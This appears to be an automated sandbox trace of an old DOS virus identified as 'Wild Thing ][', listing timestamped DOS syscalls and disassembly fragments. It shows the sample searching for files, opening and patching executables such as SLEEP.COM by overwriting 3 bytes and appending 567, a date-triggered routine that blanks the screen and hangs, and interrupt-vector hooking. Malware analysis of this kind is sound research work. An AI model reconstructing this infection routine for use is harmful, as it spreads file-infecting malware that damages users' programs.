2018-12-25T12:42:07.834123944Z 61 PC: 131b2 | Open file (Filename = '')
2018-12-25T12:42:07.840445404Z 62 PC: 131ba | Close file
2018-12-25T12:42:07.842621123Z 51 PC: 1344c | Get or set Ctrl-Break
2018-12-25T12:42:07.844554009Z 74 PC: 1197c | Reallocate memory
2018-12-25T12:42:07.846129935Z 72 PC: 11991 | Allocate memory
2018-12-25T12:42:07.847925362Z 73 PC: 119b2 | Release memory
2018-12-25T12:42:07.850354067Z 72 PC: 119bd | Allocate memory
2018-12-25T12:42:07.85216594Z 73 PC: 119df | Release memory
2018-12-25T12:42:07.853606199Z 72 PC: 119f5 | Allocate memory
2018-12-25T12:42:07.856377606Z 72 PC: 119fd | Allocate memory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":14903,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:42:05.166689196Z 26 PC: 12c51 | Set disk transfer address
2018-12-25T12:42:05.169368199Z 44 PC: 12b0e | Get time 0x12b0e: cmp dh, 0
0x12b11: je 0x12b0a
0x12b13: mov byte ptr cs:[bp + 0x338], dh
0x12b18: mov ah, 0x47
0x12b1a: mov dl, 0
0x12b1c: lea si, word ptr [bp + 0x354]
0x12b20: int 0x21
0x12b22: call 0x12c13
0x12b25: call 0x12c37
0x12b28: mov ah, 0x4e
0x12b2a: lea dx, word ptr [bp + 0x2d4]
0x12b2e: mov cx, 7
0x12b31: int 0x21
0x12b33: jb 0x12b40
0x12b35: lea dx, word ptr [bp + 0x3b2]
0x12b39: call 0x12b75
0x12b3c: mov ah, 0x4f
0x12b3e: jmp 0x12b31
0x12b40: lea dx, word ptr [bp + 0x2ea]
0x12b44: mov ah, 0x3b
2018-12-25T12:42:05.171974652Z 71 PC: 12b22 | Get current directory
2018-12-25T12:42:05.175360384Z 42 PC: 12c17 | Get date 0x12c17: cmp al, 5
0x12c19: je 0x12c1c
0x12c1b: ret
0x12c1c: mov ah, 1
0x12c1e: mov cx, 0x2020
0x12c21: int 0x10
0x12c23: mov ah, 2
0x12c25: xor dx, dx
0x12c27: int 0x10
0x12c29: xor ax, ax
0x12c2b: int 0x10
0x12c2d: mov ah, 9
0x12c2f: lea dx, word ptr [bp + 0x27a]
0x12c33: int 0x21
0x12c35: jmp 0x12c35
0x12c37: mov ah, 0x4e
0x12c39: lea dx, word ptr [bp + 0x2da]
0x12c3d: mov cx, 7
0x12c40: int 0x21
0x12c42: jae 0x12c45
2018-12-25T12:42:05.179638217Z 78 PC: 12c42 | Find first file
2018-12-25T12:42:05.186893975Z 78 PC: 12b33 | Find first file
2018-12-25T12:42:05.193378132Z 67 PC: 12b7b | Get or set file attributes
2018-12-25T12:42:05.197573043Z 67 PC: 12b89 | Get or set file attributes
2018-12-25T12:42:05.210420064Z 61 PC: 12b90 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:42:05.217706563Z 87 PC: 12b98 | Get or set file date and time
2018-12-25T12:42:05.21969602Z 63 PC: 12bad | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:42:05.227867704Z 66 PC: 12c12 | Move file pointer
2018-12-25T12:42:05.229544733Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:42:05.232634523Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:05.235365692Z 64 PC: 12d36 | Write file or device (Write 567 bytes on handle 5)
2018-12-25T12:42:05.244376906Z 87 PC: 12bf8 | Get or set file date and time
2018-12-25T12:42:05.246852513Z 62 PC: 12bfc | Close file
2018-12-25T12:42:05.255759275Z 67 PC: 12c07 | Get or set file attributes
2018-12-25T12:42:05.266805109Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:05.269728156Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:05.276590991Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:05.287515864Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:05.295069449Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:05.29743445Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:05.30512764Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:05.306831865Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:05.309903586Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:05.312784985Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:05.32258491Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:05.324384491Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:05.335235452Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:05.34640541Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:05.349732271Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:05.358417665Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:05.370151377Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:05.377884539Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:05.380358921Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:05.387688284Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:05.389396261Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:05.399115864Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:05.401146528Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:05.410722882Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:05.413073118Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:05.421899587Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:05.432811307Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:05.436145724Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:05.443415713Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:05.454448435Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:05.469115243Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:05.472203882Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:05.479700695Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:05.481726598Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:05.486135795Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:05.488757772Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:05.498400551Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:05.501047549Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:05.515143903Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:05.526466045Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:05.531362435Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:05.539085581Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:05.550454619Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:05.558412479Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:05.561575563Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:05.569180224Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:05.571256522Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:05.575617877Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:05.578392539Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:05.588367984Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:05.591332068Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:05.601108021Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:05.612457881Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:05.616431023Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:05.624077684Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:05.635397825Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:05.643290211Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:05.646410768Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:05.654014866Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:05.656097881Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:05.660366541Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:05.663957617Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:05.674802544Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:05.67774742Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:05.687025808Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:05.698765697Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:05.702371356Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:05.710059911Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:05.725196266Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:05.733864829Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:05.73686916Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:05.74431064Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:05.746283987Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:05.75088737Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:05.753983593Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:05.763424561Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:05.766281719Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:05.775337167Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:05.786613927Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:05.790717852Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:05.798360165Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:05.80945954Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:05.817452344Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:05.820267788Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:05.827840863Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:05.829934421Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:05.839237255Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:05.850372844Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:05.853345971Z 59 PC: 12b48 | Change current directory
2018-12-25T12:42:05.859811484Z 59 PC: 12b52 | Change current directory
2018-12-25T12:42:05.862454542Z 26 PC: 12c51 | Set disk transfer address (See above)
2018-12-25T12:42:05.864030427Z 9 PC: 12b6a | Display string (String= 'Wild Thing ][ ')
2018-12-25T12:42:08.069766107Z 72 PC: 8f1b9 | Allocate memory
2018-12-25T12:42:08.071867428Z 72 PC: 8f1bd | Allocate memory
2018-12-25T12:42:08.074853726Z 99 PC: 90858 | Get DBCS lead byte table pointer
2018-12-25T12:42:08.078544377Z 61 PC: 91f88 | Open file (Filename = 'C:\WINDOWS\HIMEM.SYS')
2018-12-25T12:42:08.086085568Z 66 PC: 91f95 | Move file pointer
2018-12-25T12:42:08.087224438Z 62 PC: 91fc1 | Close file
2018-12-25T12:42:08.088703372Z 75 PC: 91fe0 | Execute program
2018-12-25T12:42:08.099093119Z 98 PC: 916f1 | Get current PSP
2018-12-25T12:42:08.099979994Z 9 PC: c605 | Display string (String= '6��r�&;] u')
2018-12-25T12:42:08.102586954Z 48 PC: c609 | Get DOS version
2018-12-25T12:42:08.105010896Z 9 PC: c382 | Display string (String= ' Installed A20 handler number ')
2018-12-25T12:42:08.106663244Z 2 PC: c38c | Character output (Char = '32')
2018-12-25T12:42:08.108135665Z 2 PC: c3a7 | Character output (Char = '2e')
2018-12-25T12:42:08.110783871Z 9 PC: c6d9 | Display string (String= '�����VH�VD���V@��������������_���Ku��t1��������D�����t �� ��������a1��Z�����W���� ������5���|�����(���������Nj�(��������p�^')
2018-12-25T12:42:08.113292685Z 9 PC: c6e0 | Display string (String= '�5���|�����(���������Nj�(��������p�^')
2018-12-25T12:42:08.116227448Z 61 PC: 91f88 | Open file (See above)
2018-12-25T12:42:08.123522098Z 66 PC: 91f95 | Move file pointer (See above)
2018-12-25T12:42:08.125053989Z 62 PC: 91fc1 | Close file (See above)
2018-12-25T12:42:08.127172765Z 75 PC: 91fe0 | Execute program (See above)
2018-12-25T12:42:08.152761148Z 98 PC: 916f1 | Get current PSP (See above)
2018-12-25T12:42:08.157134913Z 82 PC: 13d46 | Get DOS internal pointers (SYSVARS)
2018-12-25T12:42:08.158346328Z 53 PC: 13ac3 | Get interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T12:42:08.160005142Z 37 PC: 13ad6 | Set interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T12:42:08.161329528Z 53 PC: 13ae0 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:42:08.162634465Z 37 PC: 13af3 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:42:08.164721071Z 9 PC: 13a0d | Display string (Could not find end pointer)
2018-12-25T12:42:08.173536803Z 62 PC: 8f8eb | Close file
2018-12-25T12:42:08.17542127Z 62 PC: 8f8f2 | Close file
2018-12-25T12:42:08.178150562Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:08.180521412Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:08.182184801Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:08.184569203Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:08.187006261Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:08.188969009Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:08.190894006Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:08.19314367Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:08.194774536Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:08.196400231Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:08.198842733Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:08.200469195Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:08.202083833Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:08.205020616Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:08.206631988Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:08.208372004Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:08.213147817Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:08.214949793Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:08.216737805Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:08.218783539Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:08.220312698Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:08.221813876Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:08.223823169Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:08.225358686Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:08.226773705Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:08.22878614Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:08.230274851Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:08.231759851Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:08.233817908Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:08.235356429Z 61 PC: 8f8ff | Open file (Filename = '')
2018-12-25T12:42:08.24073686Z 62 PC: 8f90e | Close file
2018-12-25T12:42:08.24306955Z 69 PC: 8f915 | Duplicate handle
2018-12-25T12:42:08.244850776Z 69 PC: 8f919 | Duplicate handle
2018-12-25T12:42:08.246420997Z 61 PC: 9387b | Open file (Filename = '')
2018-12-25T12:42:08.252605426Z 68 PC: 9386b | I/O control for devices (Set for = '')
2018-12-25T12:42:08.254586809Z 61 PC: 9387b | Open file (See above)
2018-12-25T12:42:08.259861444Z 68 PC: 9386b | I/O control for devices (See above)
2018-12-25T12:42:08.263098612Z 74 PC: 8f9c4 | Reallocate memory
2018-12-25T12:42:08.265036629Z 72 PC: 8f9e0 | Allocate memory
2018-12-25T12:42:08.267140722Z 72 PC: 8f9e4 | Allocate memory
2018-12-25T12:42:08.269005696Z 74 PC: 8f9fb | Reallocate memory
2018-12-25T12:42:08.270811441Z 72 PC: 8fa02 | Allocate memory
2018-12-25T12:42:08.273047951Z 72 PC: 8fa06 | Allocate memory
2018-12-25T12:42:08.275636803Z 73 PC: 8fa11 | Release memory
2018-12-25T12:42:08.276988631Z 73 PC: 8efea | Release memory
2018-12-25T12:42:08.278473974Z 74 PC: 8f003 | Reallocate memory
2018-12-25T12:42:08.280914382Z 72 PC: 8f054 | Allocate memory
2018-12-25T12:42:08.282950589Z 72 PC: 8f058 | Allocate memory
2018-12-25T12:42:08.284851637Z 73 PC: 8f060 | Release memory
2018-12-25T12:42:08.287826039Z 61 PC: 8f080 | Open file (Filename = '')
2018-12-25T12:42:08.298592572Z 63 PC: 8f095 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:42:08.305044672Z 66 PC: 8f0ad | Move file pointer
2018-12-25T12:42:08.307789643Z 62 PC: 8f0d1 | Close file
2018-12-25T12:42:08.31055884Z 75 PC: 8f0f2 | Execute program
2018-12-25T12:42:08.333999034Z 80 PC: 12be9 | Set current PSP
2018-12-25T12:42:08.335646333Z 48 PC: 12bee | Get DOS version
2018-12-25T12:42:08.338835984Z 99 PC: 193d0 | Get DBCS lead byte table pointer
2018-12-25T12:42:08.34185947Z 101 PC: 12c74 | Get extended country info
2018-12-25T12:42:08.343652602Z 99 PC: 12c7a | Get DBCS lead byte table pointer
2018-12-25T12:42:08.34651927Z 74 PC: 12cdc | Reallocate memory
2018-12-25T12:42:08.34852553Z 72 PC: 1355d | Allocate memory
2018-12-25T12:42:08.350650405Z 25 PC: 13596 | Get default drive
2018-12-25T12:42:08.353032982Z 71 PC: 135ad | Get current directory
2018-12-25T12:42:08.355741667Z 59 PC: 135ba | Change current directory
2018-12-25T12:42:08.362811407Z 59 PC: 135c8 | Change current directory
2018-12-25T12:42:08.370721724Z 59 PC: 135d3 | Change current directory
2018-12-25T12:42:08.375056565Z 25 PC: 12d13 | Get default drive
2018-12-25T12:42:08.376815808Z 37 PC: 127d3 | Set interrupt vector (Interrupt = '34' AKA 'Random write')
2018-12-25T12:42:08.379412761Z 37 PC: 127da | Set interrupt vector (Interrupt = '35' AKA 'Get file size in records')
2018-12-25T12:42:08.38149053Z 37 PC: 127e1 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:42:08.384295965Z 80 PC: 1301d | Set current PSP
2018-12-25T12:42:08.38633547Z 37 PC: 13041 | Set interrupt vector (Interrupt = '46' AKA 'Set verify flag')
2018-12-25T12:42:08.388291144Z 53 PC: 13362 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:42:08.389978879Z 37 PC: 13383 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:42:08.392478243Z 51 PC: 13417 | Get or set Ctrl-Break
2018-12-25T12:42:08.394744534Z 72 PC: 130ec | Allocate memory
2018-12-25T12:42:08.40662796Z 61 PC: 131b2 | Open file (Filename = '')
2018-12-25T12:42:08.414363362Z 62 PC: 131ba | Close file
2018-12-25T12:42:08.417415534Z 51 PC: 1344c | Get or set Ctrl-Break
2018-12-25T12:42:08.419059691Z 74 PC: 1197c | Reallocate memory
2018-12-25T12:42:08.421219733Z 72 PC: 11991 | Allocate memory
2018-12-25T12:42:08.424307225Z 73 PC: 119b2 | Release memory
2018-12-25T12:42:08.426108865Z 72 PC: 119bd | Allocate memory
2018-12-25T12:42:08.428273906Z 73 PC: 119df | Release memory
2018-12-25T12:42:08.431135896Z 72 PC: 119f5 | Allocate memory
2018-12-25T12:42:08.433421756Z 72 PC: 119fd | Allocate memory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":14903,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:42:06.829478422Z 26 PC: 12c51 | Set disk transfer address
2018-12-25T12:42:06.832684391Z 44 PC: 12b0e | Get time 0x12b0e: cmp dh, 0
0x12b11: je 0x12b0a
0x12b13: mov byte ptr cs:[bp + 0x338], dh
0x12b18: mov ah, 0x47
0x12b1a: mov dl, 0
0x12b1c: lea si, word ptr [bp + 0x354]
0x12b20: int 0x21
0x12b22: call 0x12c13
0x12b25: call 0x12c37
0x12b28: mov ah, 0x4e
0x12b2a: lea dx, word ptr [bp + 0x2d4]
0x12b2e: mov cx, 7
0x12b31: int 0x21
0x12b33: jb 0x12b40
0x12b35: lea dx, word ptr [bp + 0x3b2]
0x12b39: call 0x12b75
0x12b3c: mov ah, 0x4f
0x12b3e: jmp 0x12b31
0x12b40: lea dx, word ptr [bp + 0x2ea]
0x12b44: mov ah, 0x3b
2018-12-25T12:42:06.83479831Z 71 PC: 12b22 | Get current directory
2018-12-25T12:42:06.837547248Z 42 PC: 12c17 | Get date 0x12c17: cmp al, 5
0x12c19: je 0x12c1c
0x12c1b: ret
0x12c1c: mov ah, 1
0x12c1e: mov cx, 0x2020
0x12c21: int 0x10
0x12c23: mov ah, 2
0x12c25: xor dx, dx
0x12c27: int 0x10
0x12c29: xor ax, ax
0x12c2b: int 0x10
0x12c2d: mov ah, 9
0x12c2f: lea dx, word ptr [bp + 0x27a]
0x12c33: int 0x21
0x12c35: jmp 0x12c35
0x12c37: mov ah, 0x4e
0x12c39: lea dx, word ptr [bp + 0x2da]
0x12c3d: mov cx, 7
0x12c40: int 0x21
0x12c42: jae 0x12c45
2018-12-25T12:42:06.84071635Z 78 PC: 12c42 | Find first file
2018-12-25T12:42:06.846514441Z 78 PC: 12b33 | Find first file
2018-12-25T12:42:06.852334963Z 67 PC: 12b7b | Get or set file attributes
2018-12-25T12:42:06.859871582Z 67 PC: 12b89 | Get or set file attributes
2018-12-25T12:42:06.875923011Z 61 PC: 12b90 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:42:06.882335505Z 87 PC: 12b98 | Get or set file date and time
2018-12-25T12:42:06.884558587Z 63 PC: 12bad | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:42:06.891325114Z 66 PC: 12c12 | Move file pointer
2018-12-25T12:42:06.89299824Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:42:06.895909845Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:06.898538094Z 64 PC: 12d36 | Write file or device (Write 567 bytes on handle 5)
2018-12-25T12:42:06.907280205Z 87 PC: 12bf8 | Get or set file date and time
2018-12-25T12:42:06.909052043Z 62 PC: 12bfc | Close file
2018-12-25T12:42:06.930771726Z 67 PC: 12c07 | Get or set file attributes
2018-12-25T12:42:06.940210782Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:06.943032054Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:06.94936483Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:06.959001338Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:06.965590965Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:06.968766685Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:06.975073922Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:06.976353434Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:06.982592818Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:06.994487762Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:07.003190364Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:07.005415223Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:07.012826071Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:07.022297738Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:07.025897893Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:07.031424554Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:07.041254024Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:07.048383783Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:07.062577243Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:07.069289821Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:07.071073534Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:07.07510222Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:07.077188799Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:07.085724203Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:07.088050285Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:07.095865825Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:07.106108562Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:07.109785496Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:07.11564803Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:07.125443653Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:07.133588887Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:07.13562192Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:07.142164755Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:07.144546775Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:07.14773276Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:07.149700723Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:07.157981269Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:07.16066888Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:07.168798729Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:07.178709593Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:07.182465102Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:07.188225946Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:07.197929493Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:07.205553095Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:07.207151202Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:07.213925064Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:07.216300537Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:07.219272216Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:07.221165112Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:07.229987516Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:07.2320512Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:07.240167335Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:07.250442217Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:07.253642526Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:07.259381823Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:07.269739457Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:07.276691887Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:07.278227559Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:07.285290739Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:07.28715498Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:07.289939847Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:07.29204533Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:07.302422681Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:07.30408602Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:07.31173149Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:07.322415016Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:07.325161771Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:07.330897866Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:07.341277691Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:07.352449663Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:07.353739327Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:07.361042377Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:07.362606208Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:07.365383229Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:07.367951696Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:07.376179949Z 87 PC: 12bf8 | Get or set file date and time (See above)
